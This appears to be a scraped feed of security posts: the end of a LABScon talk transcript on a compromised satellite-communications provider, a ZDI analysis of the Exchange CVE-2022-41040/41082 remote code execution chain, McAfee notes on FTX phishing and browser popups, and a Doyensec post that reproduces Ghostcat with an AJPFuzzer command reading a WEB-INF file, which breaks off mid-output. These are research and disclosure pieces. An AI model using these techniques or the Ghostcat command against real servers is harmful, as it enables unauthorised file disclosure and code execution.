Then this is like I had to kind of shorten this part down because I'm going to be well over time if I went into it. But I think we kind of touched on this yesterday in the fireside chat. But like I think it's really easy for us as researchers to kind of blame in users for not implementing best practices and even like really basic things like logging, but like we're what do we do now? And it's 2022 and like almost no one has logging in place in like actual critical infrastructure entities or even small businesses. And I think it's like time. It's it's time for us to start stop like judging them and just telling them to do it and giving them like additional ways to do it and show them how because shaming them obviously isn't working.

MJ Emanuel:
So with the very, very, very limited data we had, like the first thing they gave us was basically just two weeks worth of firewall logs. We eventually were able to to scrape some some older historic logs from some of the backups they had, but we basically had no historic network logging at all for this incident that was multi month dwell time.

So just like in the real world, we can just say analysis happens and then it happens. So the initial findings for this incident obviously, honestly weren't that exciting where we're able to trace it back to an unpatched FortiGate that was the FortiGate that both was used for remote employees to like log in to the service provider. But it was also the FortiGate that had static routes to all their customers. That was the last hop of transmitting all of their data traffic. It was really fun. So it was like a the CVE from 2018 for for FortiGate. There's a Metasploit module for it. It's nothing that's hard to do. And what that vulnerability allows you to do is to scrape creds from all of the active sessions that are, that are running on the device. And so all the adversary had to do was was move was move through the environment using those shared admin accounts.

MJ Emanuel:
And then the other thing that they were able to do when we were interviewing the owners of this network, they kept saying, But those are our backup devices. Like those are like emergency routes. Like, why? Why is the adversary doing things they're not supposed to be doing? And it's just like, yeah, I mean, it's still connected. Like, it's still like they had like basically an out-of-band FortiGate that used the same credentials as the real FortiGate.

So yeah, it was really not that hard for the adversary to move around. And then the one thing that we really did see them doing was focusing on just basically information that could give them additional access into the environment. So things like their network management platform or their rancid server or their radius database, these are all things that we saw them being very interested into.

And then the thing that was the most concerning was that all of their customer traffic was flowing through the environment, unencrypted. I kind of thought this was going to be the case, but honestly, I wasn't really sure because I've never looked at a service provider network like this. So let's talk about like, what does that actually mean if your data traffic is flowing, unencrypted in an environment?

Here are some of the different protocols that we consider to be protocols that we were able to capture because we were tapping for, I think, three or four months with their permission. And this is a good time to plug that says A does have some bro parsers for ICS protocols that are on our GitHub.

MJ Emanuel:
So we are also always taking suggestions for additional protocols. So if any of you guys do like ICS monitoring and want something parsed, please talk to me after this.

So when we're talking about unencrypted protocols, basically the reason why the traffic was able to to move that way was because the traffic was encrypted from like here to here on that FortiGate, and then it was encrypted like here to here, but then it's unencrypted in the middle. So it's like just basic. They weren't using an encryption, but like, I don't like when we were interviewing a lot of their end users with the permission of the company, most of them didn't realize that their data was at risk in that way.

And this is actually a simplified diagram of how the data was flowing. There is actually like 2 to 3 more hops to different telecommunication providers. And so that means that that data traffic was at risk at all of those different providers. So this was the point where people started to freak out. But I don't want us to do that yet. I think like something that is a really large misconception is that for some of these protocols, you can just like push a function code that says like, do bad and will blow something up. That's not how it works. So we're going to talk a little bit about what does it mean if you can do something like read a coil or write a coil.

MJ Emanuel:
So, you know, going back to the diagram earlier, if you are at that programmable logic controller and you're telling a temperature sensor to do something or you're opening a valve when it shouldn't be, how much additional work does it take for there to be some sort of physical impact? And that's really going to be unique to every case. And I think that's why doing true impact analysis on these systems is so hard.

So initial conclusions about the the incident followed for a compromise. We're not going to be able to detect anything else they're doing because there was no logging. The most exciting thing here is that they actually did take pcap and exfil it on the interface where the customer data traffic was flowing. So we knew that they knew what they had or they could have known what they had. I'm sure there was other we don't obviously know exactly why they did that, but in my opinion, I feel like they did understand the value of the data that that they were they had access to.

So what are the other potential consequences to that system? And in order to illustrate this point, I'm going to talk about a specific sector which really heavily uses remote connectivity, which is natural gas pipelines. So the main point here is basically the natural gas sector kind of has like three subcomponents.

MJ Emanuel:
There's production, there's transmission and there's distribution. And the important part here is that there's often a couple of really key players in the space, like it's very consolidated industry that does the transmission part. So they're responsible for transmitting gas basically across state lines over long distances, and then they have contracts with the distribution sector. So like the gas that's coming to you locally is never going to be coming from these transmission environments. Yeah.

So what kind of data is being generated? We I hope we have a little bit of a better understanding of what data traffic looks like, but like, what are the types of things that it's being used to control?

One of those things are compressor stations. So basically every 50 to 100 miles on natural gas pipelines, there are compressor stations that basically filter the gas re compress it and cool it down. It just helps with the efficiency of those systems. So in every 50 to 100 miles, there's basically, excuse me, a remote site that is going to be doing those functions. And so there are both commands that need to be sent to those, as well as maintenance data or other data that's coming back from how those systems are operating. So that's one of the big reasons why they use remote connectivity.

And then the other really big one are kind of the interconnect points. So as the data is coming from the transmission companies down to the distribution companies, the interconnect point is how the like when Company X buys from company Y like that, that valve there is is is physically diverting how much they they buy, how much gas they buy.

MJ Emanuel:
So in theory, an interconnect point is actually a much more exciting target to an adversary because if if you are able to compromise how that valve is working, then you can potentially turn off gas to any of the downstream customers.

And then so that's the kind of data that's being generated we're willing to talk about like how is that data at risk? So what means if commands are being spoofed, what means if you don't have if you can't see or if you don't have control over those environments, but maybe they'll still work, like with the wind turbines, What happens if you can't see them or control them?

And then the other really important part here is are these primary or secondary comms pathways, like luckily, because critical infrastructure often knows that they're important, they do have a lot of redundancy built in. So when we were talking to a lot of the end users of, of the service provider, it kind of varied by just how their business contract worked out. Like were these satellite communications being used as just backups or were they primary? And there was a mix of both.

And when we talk about like impact to control process, so like what are the impacts from the different commands that are being sent versus impact to the to the physical impacts of the system? I think a really helpful tool to kind of generate those ideas is the ICS attack framework from MITRE.

MJ Emanuel:
So this is kind of like the last three columns of that. And I think the first two columns kind of talk about like what are the what is the impact to the logic controller? And then the last column is kind of like what is the impact to the system as a whole?

Okay, I'm out of time but will go really quickly. Conclusions. There was a when we talked about mitigations, I'm going to say I don't really know about mitigations because I like to do threat analysis, not mitigations. But there was a lot of fanfare from this NSA cybersecurity advisory that came out a couple of weeks ago or months ago now. I think it's a really good starting point, but you can tell that it was really inspired by military applications of satellite communications. It doesn't really go into the nuances of other applications. Like one of the biggest things is it basically just says like encrypt your systems or excuse me, encrypt your data links and like they're not wrong. But also when we're talking about real time operations, like you often can't just add transact to that. That's going to mess up the timing. So I think we need to we can't just like keep telling people to read this.

MJ Emanuel:
We need to like think a little bit more harder about these systems. And then there's just other common sense like Patriot systems in that CSA. I think like the biggest mitigation that I took away from this experience is that and the customers that we are the end users of that satcom provider. The biggest thing that we really were informing them was that there was a lot of risk. They did not know in the systems that they had implemented. So we just really need to continue to tell them that you can't treat your third party communication pathways as trusted. Like you have to think about it like public internet, like even if it's a private data stream, it's really not private.

So final thoughts. Systems are complicated. Let's kind of go consequent driven in our analysis, like let's not just stop at where the Iot part stops. Let's let's go all the way down to the physical process. And then like, what drives change? Like when I was doing some of the research for this talk, I found like a document from 2006 that basically said everything that I'm saying. So like, obviously what we're doing isn't working and I think we need to have some we need to stop getting spun up about like ICS and like actually talk about like how can we protect these systems from an engineering perspective? Okay. That's it. Thank you. What questions do you have for me? That's it.

Ryan Naraine:
It was amazing. Thank you very much. Let's pick a gift for you. Any questions for MJ over here? Alex, quickly. There is.

Question :
Sure. You know, basically like. We don't have a place of knowledge. So basically it's mindset. It's like, don't touch it. So how did you move from that mindset and what steps to. Actually change that?

Yeah, I think that's a really good question.

Ryan Naraine:
Repeat the question.

MJ Emanuel:
Yeah, sorry. Basically, I think your question was like, how do we how do we move past telling people not to touch their systems? Amazing. I think and I come from oh, sorry, I come from a cyber background, not a not a engineering background. And I think the the first thing that I think we have to do is basically education, which is kind of what I'm trying to do here and make it seem less scary and like actually give people like the understanding of the different pieces so that then we can have a conversation. But honestly, I don't know what to. Yeah.

Question :
What did it say? So I think you're absolutely right. And in educating industry, it's very important step. But education without enforcement later, like doesn't work. It's like security development lifecycle. You can teach the developers how to write the secure code, but if it's no enforcement, it will be tons of bugs.

MJ Emanuel:
Yeah, I think what I really meant wasn't educating the industry, but it was educating people in cybersecurity so that they can stop thinking of it as something other and then kind of move forward like we have with other cyber problems, if that makes sense. But it's hard.

Ryan Naraine:
Thank you. Another big round of applause for MJ.

Sonix is the world’s most advanced automated transcription, translation, and subtitling platform. Fast, accurate, and affordable.

Automatically convert your mp4 files to text (txt file), Microsoft Word (docx file), and SubRip Subtitle (srt file) in minutes.

Sonix has many features that you’d love including enterprise-grade admin tools, advanced search, transcribe multiple languages, collaboration tools, and easily transcribe your Zoom meetings. Try Sonix for free today.

About the Presenter

MJ Emanuel is an incident response analyst at the U.S. government’s Cybersecurity & Infrastructure Security Agency (CISA). Her work focuses on industrial controls systems, threat intelligence, and forensics.

Prior to joining CISA, she was a malware and CTI analyst at the National Cyber Forensics and Training Alliance. She has a BA in environmental studies from Hendrix College and an MS in information security policy and management from Carnegie Mellon University.

About LABScon

This presentation was featured live at LABScon 2022, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Announcing the Microsoft Machine Learning Membership Inference Competition (MICO)

16 November 2022 at 18:58
We’re excited to announce the launch of a new competition focusing on the security and privacy of machine learning (ML) systems. Machine learning has already become a key enabler in many products and services, and this trend is likely to continue. It is therefore critical to understand the security and privacy guarantees provided by state-of-the-art …

Announcing the Microsoft Machine Learning Membership Inference Competition (MICO) Read More »

Control Your Types or Get Pwned: Remote Code Execution in Exchange PowerShell Backend

16 November 2022 at 16:55

By now you have likely already heard about the in-the-wild exploitation of Exchange Server, chaining CVE-2022-41040 and CVE-2022-41082. It was originally submitted to the ZDI program by the researcher known as “DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q from GTSC”. After successful validation, it was immediately submitted to Microsoft. They patched both bugs along with several other Exchange vulnerabilities in the November Patch Tuesday release.

It is a beautiful chain, with an ingenious vector for gaining remote code execution. The tricky part is that it can be exploited in multiple ways, making both mitigation and detection harder. This blog post is divided into two main parts:

·       Part 1 – where we review details of the good old ProxyShell Path Confusion vulnerability (CVE-2021-34473), and we show that it can still be abused by a low-privileged user.
·       Part 2 – where we present the novel RCE vector in the Exchange PowerShell backend.

 Here’s a quick demonstration of the bugs in action:

Part 1: The ProxyShell Path Confusion for Every User (CVE-2022-41040)

There is a great chance that you are already familiar with the original ProxyShell Path Confusion vulnerability (CVE-2021-34473), which allowed Orange Tsai to access the Exchange PowerShell backend during Pwn2Own Vancouver 2021. If you are not, I encourage you to read the details in this blog post.

Microsoft patched this vulnerability in July of 2021. However, it turned out that the patch did not address the root cause of the vulnerability. Post-patch, unauthenticated attackers are no longer able to exploit it due to the implemented access restrictions, but the root cause remains.

First, let’s see what happens if we try to exploit it without authentication.

HTTP Request

HTTP Response

As expected, a 401 Unauthorized error was returned. However, can you spot something interesting in the response? The server says that we can try to authenticate with either Basic or NTLM authentication. Let’s give it a shot.

HTTP Request

HTTP Response

Exchange says that it is cool now! This shows us that:

·       The ProxyShell Path Confusion still exists, as we can reach the PowerShell backend through the autodiscover endpoints.
·       As the autodiscover endpoints allow the use of legacy authentication (NTLM and Basic authentication) by default, we can access those endpoints by providing valid credentials. After successful authentication, our request will be redirected to the selected backend service.

Legacy authentication in Exchange is described by Microsoft here. The following screenshot presents a fragment of the table included in the previously mentioned webpage.

Figure 1 - Legacy authentication in Exchange services, source: https://learn.microsoft.com/

According to the documentation and some manual testing, it seems that an Exchange instance was protected against this vulnerability if:

·       A custom protection mechanism was deployed that blocks the Autodiscover SSRF vector (for example, on the basis of the URL), or
·       If legacy authentication was blocked for the Autodiscover service. This can be done with a single command (though an Exchange Server restart is probably required):

Set-AuthenticationPolicy -BlockLegacyAuthAutodiscover:$true

So far, we have discovered that an authenticated user can access the Exchange PowerShell backend. We will now proceed to the second part of this blog post to discuss how this can be exploited for remote code execution.

Part 2: PowerShell Remoting Objects Conversions – Be Careful or Be Pwned (CVE-2022-41082)

In this part, we will focus on the remote code execution vulnerability in the Exchange PowerShell backend. It is a particularly interesting vulnerability, and is based on two aspects:

·       PowerShell Remoting conversions and instantiations.
·       Exchange custom converters.

It has been a very long ride for me to understand this vulnerability fully and I find that I am still learning more about PowerShell Remoting. The PowerShell Remoting Protocol has a very extensive specifications and there are some hidden treasures in there. You may want to look at the official documentation, although I will try to guide you through the most important aspects. The discussion here should be enough to understand the vulnerability.

PowerShell Remoting Conversions Basics and Exchange Converters

There are several ways in which serialized objects can be passed to a PowerShell Remoting instance. We can divide those objects into two main categories:

·       Primitive type objects
·       Complex objects

Primitive types are not always what you would think of as “primitive”. We have some basic types here such as strings and byte arrays, but “primitive types” also include types such as URI, XMLDocument and ScriptBlock (the last of which is blocked by default in Exchange). Primitive type objects can usually be specified with a single XML tag, for example:

Complex objects have a completely different representation. Let’s take a quick look at the example from the documentation:

First, we can see that the object is specified with the “Obj” tag. Then, we use the “TN” and “T” tags to specify the object type. Here, we have the System.Drawing.Point type, which inherits from System.ValueType.

An object can be constructed in multiple ways. Shown here is probably the simplest case: direct specification of properties. The “Props” tag defines the properties of the object. You can verify this by comparing the presented serialized object and the class documentation.

One may ask: How does PowerShell Remoting deserialize objects? Sadly, there is no single, easy answer here. PowerShell Remoting implements multiple object deserialization (or conversion) mechanisms, including quite complex logic and as well as some validation. I will focus on two main aspects, which are crucial for our vulnerability.

a)     Verifying if the specified type can be deserialized
b)     Converting (deserializing) the object

Which Types Can Be Deserialized?

PowerShell Remoting will not deserialize all .NET types. By default, it allows those types related to the remoting protocol itself. However, the list of allowed types can be extended. Exchange does that through two files:

·       Exchange.types.ps1xml
·       Exchange.partial.types.ps1xml

 An example entry included in those files will be presented soon.

In general, the type specified in the payload that can be deserialized is referenced as the “Target Type For Deserialization”. Let’s move to the second part.

How Is Conversion Performed?

In general, conversion is done in the following way.

·       Retrieve properties/member sets, deserializing complex values if necessary.
·       Verify that this type is allowed to be deserialized.
·       If yes, perform the conversion.

Now the most important part. PowerShell Remoting implements multiple conversion routines. In order to decide which converter should be used, the System.Management.Automation.LanguagePrimitives.FigureConversion(Type, Type) method is used. It accepts two input arguments:

·       Type fromType – the type from which the object will be obtained (for example, string or byte array).
·       Type toType – the target type for deserialization.

The FigureConversion method contains logic to find a proper converter. If it is not able to find any converter, it will throw an exception.

As already mentioned, multiple converters are available. However, the most interesting for us are:

·       ConvertViaParseMethod – invokes Parse(String) method on the target type. In this case, we control the string argument.
·       ConvertViaConstructor – invokes the single-argument constructor that accepts an argument of type fromType. In this case, we can control the argument, but limitations apply.
·       ConvertViaCast – invokes the proper cast operator, which could be an implicit or explicit cast.
·       ConvertViaNoArgumentConstructor – invokes the no-argument constructor and sets the public properties using reflection.
·       CustomConverter – there are also some custom converters specified.

As we can see, these conversions are very powerful and provide a strong reflection primitive. In fact, some of them were already mentioned in the well-known Friday the 13th JSON Attacks Black Hat paper. As we have mentioned, though, the toType is validated and we are not able to use these converters to instantiate objects of arbitrary type. That would certainly be a major security hole.

SerializationTypeConverter – Exchange Custom Converter

Let’s have a look at one particular item specified in the Exchange.types.ps1xml file:

There are several basic things that we can learn from this XML fragment:

·       Microsoft.Exchange.Data.IPvxAddress class is included in the list of the allowed target types.
·       The TargetTypeForDeserialization member gives the full class name.
·       A custom type converter is defined: Microsoft.Exchange.Data.SerializationTypeConverter

The SerializationTypeConverter wraps the BinaryFormatter serializer with ExchangeBinaryFormatterFactory. That way, the BinaryFormatter instance created will make use of the allow and block lists. 

To sum up, some of our types (or members) can be retrieved through BinaryFormatter deserialization. Those types must be included in the SerializationTypeConverter allowlist, though. Moreover, custom converters are last-resort converters. Before they are used, PowerShell Remoting will try to retrieve the object through a constructor or a Parse method.

RCE Payload Walkthrough

It is high time to show you the RCE payload and see what happens during the conversion.

This XML fragment presents the specification of the “-Identity” argument of the “Get-Mailbox” Exchange Powershell cmdlet. We have divided the payload into three sections: Object type, Properties, and Payload.

·       Object type section – specifies that there will be an object of type System.ServiceProcess.ServiceController.
·       Properties section – specifies the properties of the object. One thing that should catch your attention here is the property with the name TargetTypeForDeserialization. You should also notice the byte array with the name SerializationData. (Note that Powershell Remoting accepts an array of bytes in the form of a base64 encoded string).
·       Payload section – contains XML in the form of a string. The XML is a XAML deserialization gadget based on ObjectDataProvider.

Getting Control over TargetTypeForDeserialization

In the first step, we are going to focus on the Properties section of the RCE payload. Before we do that, let’s quickly look at some fragments of the deserialization code. The majority of the deserialization routines are implemented in the System.Management.Automation.InternalDeserializer class.

Let’s begin with this fragment of the ReadOneObject(out string) method:

At [1], it invokes the ReadOneDeserializedObject method, which may return an object.

At [2], the code flow continues, provided an object has been returned. We will focus on this part later.

Let’s quickly look at the ReadOneDeserializedObject method. It goes through the XML tags and executes appropriate actions, depending on the tag. However, only one line is particularly interesting for us.

At [1], it calls ReadPSObject. This happens when the tag name is equal to “Obj”.

Finally, we analyze a fragment of the ReadPSObject function.

At [1], the code retrieves the type names (strings) from the <TN> tag.

At [2], the code retrieves the properties from the <Props> tag.

At [3], the code retrieves the member set from the <MS> tag.

At [4], the code tries to read the primary type (such as string or byte array).

At [5], the code initializes a new deserialization procedure, provided that the tag is an <Obj> tag.

 

So far, we have seen how InternalDeserializer parses the Powershell Remoting XML. As shown earlier, the Properties section of the payload contains a <Props> tag. It seems that we must look at the ReadProperties method.

At [1], the adaptedMembers property of the PSObject object is set to some PowerShell-related collection.

At [2], the property name is obtained (from the N attribute).

At [3], the code again invokes ReadOneObject in order to deserialize the nested object.

At [4], it instantiates a PSProperty object, based on the deserialized value and the property name.

Finally, at [5], it extends adaptedMembers by adding the new PSProperty. This is a crucial step, pay close attention to this.

Let’s again look at the Payload section of our RCE payload:

We have two properties defined here:

·       The Name property, which is of type string and whose value is the string “Type”.

·       The TargetTypeForDeserialization property, whose value is a complex object specified as follows:

o   The type (TN tag) is System.Exception.
o   There is a value stored as a base64 encoded string, representing a byte array.

We have already seen that nested objects (defined with the Obj tag) are also deserialized with the ReadOneObject method. We have already looked at its first part (object retrieval). Now, let’s see what happens further:

At [1], the code retrieves the Type targetTypeForDeserialization through the GetTargetTypeForDeserialization method.

At [2], the code tries to retrieve a new object through the LanguagePrimitives.ConvertTo method (if GetTargetTypeForDeserialization returned anything). The targetTypeForDeserialization is one of the inputs. Another input is the object obtained with the already analyzed ReadOneDeserializedObject method.

As we have specified the object of the System.Exception type (TN tag), the GetTargetTypeForDeserialization method will return the System.Exception type. Why does the exploit use Exception? For two reasons:

·       It is included in the allowlist exchange.partial.types.ps1xml.
·       It has a custom converter registered: Microsoft.Exchange.Data.SerializationTypeConverter.

 These two conditions are important because they allow the object to be retrieved using the SerializationTypeConverter, which was discussed above as a wrapper for BinaryFormatter. Note that there are also various other types available besides System.Exception that meet the two conditions mentioned here, and those types could be used as an alternative to System.Exception.

 Have you ever tried to serialize an object of type Type? If yes, you probably know that it is serialized as an instance of System.UnitySerializationHolder. If you base64-decode the string provided in the Properties part of our payload, you will quickly realize that it is a System.UnitySerializationHolder with the following properties:

·       m_unityType = 0x04,
·       m_assemblyName = "PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
·       m_data = "System.Windows.Markup.XamlReader".

To sum up, our byte array holds the object, which constructs a XamlReader type upon deserialization! That is why we want to use the SerializationTypeConverter – it allows us to retrieve an object of type Type. An immediate difficulty is apparent here, though, because Exchange’s BinaryFormatter is limited to types on the allowlist. Hence, it’s not clear why the deserialization of this byte array should succeed. Amazingly, though, System.UnitySerializationHolder is included in the SerializationTypeConverter’s list of allowed types!

Let’s see how it looks in the debugger:

Figure 2 - Deserialization leading to the retrieval of the XamlReader Type

Even though the targetTypeForDeserialization is Exception, LanguagePrimitives.ConvertTo returned the Type object for XamlReader (see variable obj2). This happens because the final type of the retrieved object is not verified. Finally, this Type object will be added to the adaptedMembers collection (see the ReadProperties method).

Getting Code Execution Through XamlReader, or Any Other Class

We have already deserialized the TargetTypeForDeserialization property, which is a Type object for the XamlReader type. Perfect! As you might expect, allowing users to obtain an arbitrary Type object through deserialization is not the best idea. But we still need to understand: why does PowerShell Remoting respect such a user-defined property? To begin answering this, let’s consider what the code should do next:

·       It should deserialize the <S> tag defined after the <Props> tag (payload section of the input XML). This is a primitive string type, thus it retrieves the string.
·       It should take the type of the main object, which is defined in the <TN> tag (here: System.ServiceProcess.ServiceController).
·       It should try to create the System.ServiceProcess.ServiceController instance from the provided string.

Our goal is to switch types here. We want to perform a conversion so that the System.Windows.Markup.XamlReader type is retrieved from the string. Let’s analyze the GetTargetTypeForDeserialization function to see how this can be achieved.

At [1], it tries to retrieve an object of the PSMemberInfo type using the GetPSStandardMember method. It passes two parameters: backupTypeTable (this contains the Powershell Remoting allowed types/converters) and the hardcoded string “TargetTypeForDeserialization”.

At [2], the code retrieves the Value member from the obtained object and tries to cast it to Type. When successful, the Type object will be returned. If not, null will be returned.

GetPSStandardMember method is not easy to understand, especially when you are not familiar with the classes and methods used here. However, I will try to summarize it for you in two points:

At [1], the PSMemberSet object is retrieved through the TypeTableGetMemberDelegate method. It takes our specified type (here, System.ServiceProcess.ServiceController) and compares it against the list of allowed types. If the provided type is allowed, it will extract its properties and create the new member set.

The following screenshot presents the PSMemberSet retrieved for the System.ServiceProcess.ServiceController type:

Figure 3 - PSMemberSet retrieved for the System.ServiceProcess.ServiceController type

At [2], the collection of members is created from multiple sources. If a member is not included in the basic member set (obtained from the list of allowed types), it will try to find such a member in a different source. This collection includes the adapted members, which contain the deserialized properties obtained through the Props tag.

Finally, it will try to retrieve the TargetTypeForDeserialization member from the final collection.

Let’s have a quick look at the specification of the System.ServiceProcess.ServiceController in the list of allowed types. It is defined in the default Powershell Remoting types list, located in C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml.

As you can see, this type does not have the TargetTypeForDeserialization member specified. Only the DefaultDisplayPropertySet member is defined. According to that, the targetTypeForDeserialization will be retrieved from adaptedMembers. As the Exchange SerializationTypeConverter converter allows us to retrieve a Type through deserialization, we can provide a new conversion type to adaptedMembers!

Following screenshot presents the obtained psmemberinfo, which defines the XamlReader type:

Figure 4 - Retrieved XamlReader type

Success! GetTargetTypeForDeserialization returned the XamlReader type. You probably remember that PowerShell Remoting contains several converters. One of them allows calling the Parse(String) method. According to that, we can call the XamlReader.Parse(String) method, where the input will be equal to the string provided in the <S> tag. Let’s quickly verify it with the debugger.

The following screenshot presents the debugging of the LanguagePrimitive.ConvertTo method. The resultType is indeed equal to the XamlReader:

Figure 5 - Debugging of the ConvertTo method - resultType

The next screenshot presents the valueToConvert argument. It includes the string (XAML gadget) included in our payload:

Figure 6 - Debugging of the ConvertTo method - valueToConvert

We will soon reach the LanguagePrimitives.FigureParseConversion method. The following screenshot illustrates debugging this method. One can see that:

·       fromType is equal to String.
·       toType is equal to XamlReader.
· methodInfo contains the XamlReader.Parse(String string) method.

Figure 7 – Debugging the LanguagePrimitives.FigureParseConversion method

Yes! We have been able to get the XamlReader.Parse(String string) method through reflection! We also fully control the input that will be passed to this function. Finally, it will be invoked through the System.Management.Automation.LanguagePrimitives.ConvertViaParseMethod.ConvertWithoutCulture method, as presented in the following screenshot:

Figure 8 - Execution of the XamlReader.Parse method

As you may be aware, XamlReader allows us to achieve code execution through loading XAML (see ysoserial.net). When we continue the process, our command gets executed.

Figure 9 - Remote Code Execution through the Exchange PowerShell backend

There are also plenty of other classes besides XamlReader that could be abused in a similar way. For example, you can call the single-argument constructor of any type, so you can be creative here!

TL;DR – Summary

Getting to understand this vulnerability has been a long and complicated process. I hope that I have provided enough details for you to understand this issue. I would like to summarize the whole Microsoft Exchange chain in several points:

·       The path confusion in the Autodiscover service (CVE-2021-34473) was not fixed, but rather it was restricted to unauthenticated users. Authenticated users can still easily abuse it using Basic or NTLM authentication.

·       PowerShell Remoting allows us to perform object deserialization/conversion operations.

·       PowerShell Remoting includes several powerful converters, which can:

o   Call the public single-argument constructor of the provided type.
o   Call the public Parse(String) method of the provided type.
o   Retrieve an object through reflection.
o   Call custom converters.
o   Other conversions may be possible as well.

·       PowerShell Remoting implements a list of allowed types, so an attacker cannot (directly) invoke converters to instantiate arbitrary types.

·       However, the Exchange custom converter named SerializationTypeConverter allows us to obtain an arbitrary object of type Type.

·       This can be leveraged to fully control the type that will be retrieved through a conversion.

·       The attacker can abuse this behavior to call the Parse(String) method or the public single-argument constructor of almost any class while controlling the input argument.

·       This behavior easily leads to remote code execution. This blog post illustrates exploitation using the System.Windows.Markup.XamlReader.Parse(String) method.

It was not clear to us how Microsoft was going to approach fixing this vulnerability. Direct removal of the System.UnitySerializationHolder from the SerializationTypeConverter allowlist might cause breakage to Exchange functionality. One potential option was to restrict the returned types, for example, by restricting them to the types in the “Microsoft.Exchange.*” namespace. Accordingly, I started looking for Exchange-internal exploitation gadgets. I found more than 20 of them and reported them to Microsoft to help them with their mitigation efforts. That effort appears to have paid off. Microsoft patched the vulnerability by restricting the types that can be returned through the deserialization of System.UnitySerializationHolder according to a general allowlist, and then restricting them further according to a specific denylist. It seems that the gadgets I reported had an influence on that allowlist. I will probably detail some of those gadgets in a future blog post. Stay tuned for more…

Summary

I must admit that I was impressed with this vulnerability. The researcher clearly invested a good amount of time to fully understand the details of PowerShell Remoting, analyze Exchange custom converters, and find a way to abuse them. I had to take my analysis to another level to fully understand this bug chain and look for potential variants and alternate gadgets.

Microsoft patched these bugs in the November release. They also published a blog with additional workarounds you can employ while you test and deploy the patches. You should also make sure you have the September 2021 Cumulative Update (CU) installed. This adds the Exchange Emergency Mitigation service. This automatically installs available mitigations and sends diagnostic data to Microsoft. Still, the best method to prevent exploitation is to apply the most current security updates as they are released. We expect more Exchange patches in the coming months.

In a future blog post, I will describe some internal Exchange gadgets that can be abused to gain remote code execution, arbitrary file reads, or denial-of-service conditions. These have been reported to Microsoft, but we are still waiting for these bug reports to be addressed with patches.   Until then, you can follow me @chudypb and follow the team on Twitter or Instagram for the latest in exploit techniques and security patches.

Control Your Types or Get Pwned: Remote Code Execution in Exchange PowerShell Backend

Threat Actors Taking Advantage of FTX Bankruptcy 

15 November 2022 at 18:23

Authored by Oliver Devane 

It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX,  McAfee has discovered several phishing sites targeting FTX users.  

One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it. 

Upon analyzing the website code used to create the phishing sites, we noticed that they were extremely similar to previous sites targeting WalletConnect customers, so it appears that they likely just modified a previous phishing kit to target FTX users.  

The image below shows a code comparison between a website from June 2022, and it shows that the FTX phishing site shares most of its code with it.  

McAfee urges anyone who was using FTX to be weary of any unsolicited emails or social media messages they receive and to double-check the authenticity before accessing them. If you are unsure of the signs to look for, please check out the McAfee Scam education portal (https://www.mcafee.com/consumer/en-us/landing-page/retention/scammer-education.html) 

McAfee customers are protected against the sites mentioned in this blog 

Type  Value  Product  Detected 
URL  ftx-users-refund[.]com  McAfee WebAdvisor  Blocked 
URL  ftx-refund[.]com  McAfee WebAdvisor  Blocked 

 

The post Threat Actors Taking Advantage of FTX Bankruptcy  appeared first on McAfee Blog.

Microsoft’s Edge over Popups (and Google Chrome)

15 November 2022 at 17:02

Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number of deceptive push notifications reported by McAfee consumers running Microsoft’s Edge browser on Windows.

Such browser-delivered push messages appear as toaster pop-ups in the tray above the system clock and are meant to trick users into taking various actions, such as installing software, purchasing a subscription, or providing personal information.

example of a deceptive push notification
example of a deceptive push notification

Upon further investigation, this major drop seems to be associated with a change in the behavior of the Edge browser with two notable improvements over older versions.

First, when users visit websites known to deliver deceptive push notifications, Edge blocks authorization prompts that could trick users into opting-in to receive popups:

Second, when unwanted popups do occur, it is now easier than ever to disable them, on a per-site basis.  Users can simply click the three dots (…) on the right of the notification and choose to “Turn off all notifications for” the domain responsible for the popup.

This is a great improvement over the previous experience of having to manually navigate browser settings to achieve the desired result.

Earlier this year, 9TO5Google reported a Chrome code change may be indicative of a similar crack down by Google on nefarious popups.

One can hope Google will follow Microsoft’s example to improve browser security and usability.

The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.

Let's speak AJP

14 November 2022 at 23:00

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to manage efficiently the network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below: AJP schema

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potential discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimental fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz on arbitrary elements within the packet.

With minor tuning, AJPFuzzer can be also used to quickly reproduce the GhostCat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest request including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the discosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
